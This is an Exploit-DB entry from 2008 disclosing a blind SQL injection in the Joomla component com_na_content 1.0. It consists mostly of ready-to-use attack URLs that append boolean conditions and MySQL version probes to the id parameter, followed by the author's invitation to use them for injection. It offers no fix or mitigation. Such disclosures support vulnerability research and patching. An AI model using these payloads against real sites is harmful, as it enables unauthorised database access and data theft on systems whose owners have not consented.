Joomla! Component com_na_content 1.0 - Blind SQL Injection

EDB-ID:

7612

CVE:

N/A


Platform:

PHP

Published:

2008-12-29

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
            /index.php?option=com_na_content&task=view&id=1 having 1=1
or

            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!

# milw0rm.com [2008-12-29]